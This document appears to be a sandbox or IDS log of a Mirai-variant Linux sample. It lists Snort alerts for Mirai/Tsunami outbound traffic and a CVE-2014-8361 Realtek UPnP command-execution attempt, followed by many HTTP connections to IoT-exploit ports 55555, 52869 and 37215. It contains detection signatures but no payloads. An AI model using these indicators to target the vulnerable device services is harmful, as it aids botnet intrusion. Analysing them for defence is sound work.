    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34890 -> 95.100.74.158:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46568 -> 95.158.181.247:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33430 -> 156.254.36.105:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44586 -> 95.211.77.133:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42684 -> 95.131.48.130:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44116 -> 95.215.208.100:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45908 -> 95.85.25.43:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53424 -> 95.173.110.51:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33790 -> 95.216.123.81:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34312 -> 95.100.119.63:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34538 -> 95.56.223.151:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54226 -> 95.110.132.142:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58358 -> 95.89.187.102:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40092 -> 95.211.117.105:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56302 -> 95.163.40.130:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33788 -> 95.56.81.2:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56372 -> 95.167.25.166:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60962 -> 95.217.215.86:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56792 -> 95.140.228.9:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52178 -> 95.100.190.251:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39170 -> 95.101.250.139:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47804 -> 95.142.35.111:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40458 -> 95.56.61.35:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54294 -> 95.213.135.6:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42658 -> 112.79.32.42:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44472 -> 95.131.136.65:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39746 -> 95.217.105.186:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60662 -> 95.216.8.62:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47048 -> 112.135.200.33:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54502 -> 112.168.6.119:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57896 -> 95.56.234.111:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55278 -> 95.56.22.69:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35526 -> 95.216.169.96:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40654 -> 95.183.14.150:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48088 -> 95.65.49.228:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41284 -> 95.161.129.147:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36654 -> 95.205.109.44:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46834 -> 95.100.95.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41746 -> 95.154.210.138:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35652 -> 95.179.202.205:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54376 -> 95.180.165.203:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52942 -> 95.101.210.226:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54070 -> 95.179.231.252:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52794 -> 95.216.218.36:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43272 -> 95.179.217.3:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37940 -> 95.217.147.80:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59576 -> 95.65.73.151:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59850 -> 95.68.89.190:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60170 -> 112.215.101.81:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32930 -> 95.101.98.192:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36966 -> 95.161.182.2:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55826 -> 95.101.164.58:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52654 -> 95.183.39.56:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45916 -> 95.214.251.138:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58058 -> 95.216.145.154:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52190 -> 95.161.204.90:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34130 -> 112.121.177.221:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55808 -> 95.100.221.124:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34616 -> 95.111.225.144:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59972 -> 95.154.217.95:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36576 -> 95.100.177.159:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48134 -> 95.217.121.57:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41036 -> 95.216.145.72:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46396 -> 95.140.156.43:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37410 -> 95.143.229.49:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36084 -> 95.56.29.180:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43244 -> 95.163.168.109:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46012 -> 95.216.99.213:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40482 -> 95.179.195.106:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59806 -> 95.101.94.223:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38548 -> 95.215.170.31:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46096 -> 95.216.99.213:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59942 -> 95.252.1.155:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56522 -> 95.216.186.95:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34872 -> 95.181.228.221:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45094 -> 95.217.110.151:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38146 -> 95.85.3.8:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37696 -> 95.128.133.25:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47596 -> 95.216.219.71:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55000 -> 95.174.24.164:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38412 -> 95.211.102.29:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45090 -> 95.217.156.252:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46488 -> 95.210.63.28:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55928 -> 95.175.112.178:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38106 -> 95.65.111.192:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49820 -> 95.142.75.181:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39608 -> 95.111.244.253:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52956 -> 95.101.85.88:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56948 -> 95.140.152.60:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36210 -> 95.101.50.29:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38300 -> 95.140.157.174:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59730 -> 95.101.153.187:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34304 -> 95.101.96.216:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53860 -> 95.60.156.108:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40996 -> 95.100.123.205:80
    Source: unknownNetwork traffic detected: HTTP traffic on port 41558 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58786 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39286 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55154 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 55154
    Source: unknownNetwork traffic detected: HTTP traffic on port 51970 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37458 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37462 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33210 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39484 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34712 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43396 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 43396
    Source: unknownNetwork traffic detected: HTTP traffic on port 57792 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53270 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 45458
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 53270
    Source: unknownNetwork traffic detected: HTTP traffic on port 33718 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47180 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56188 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59008 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40090 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52538 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51174
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53844 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40842 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56360 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35938 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51098 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51098
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 43860 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35494 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 32864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 52616 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54388 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 60084
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49422 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52408 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49528 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 49528
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44762 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39812 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47034 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33590 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35796 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36640 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55086 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60136 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 38672 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55974 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 55974
    Source: unknownNetwork traffic detected: HTTP traffic on port 33864 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55462 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50730 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36138 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56510 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 41482 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 36878 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33166 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37104 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 37104
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38248 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48116 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57824 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58338 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51928 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 39084 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 54778 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35052 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 51928
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42544 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59122 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57116 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37294 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47764 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42736 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 53180 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 47618 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 47618
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44390 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34720 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35856 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 37828 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 33940 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 58972 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 59304 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 55555 -> 59304
    Source: unknownNetwork traffic detected: HTTP traffic on port 58068 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 60120 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 42024 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 56442 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 35036 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 45536 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 49556 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 46568 -> 55555
    Source: unknownNetwork traffic detected: HTTP traffic on port 44332 -> 55555
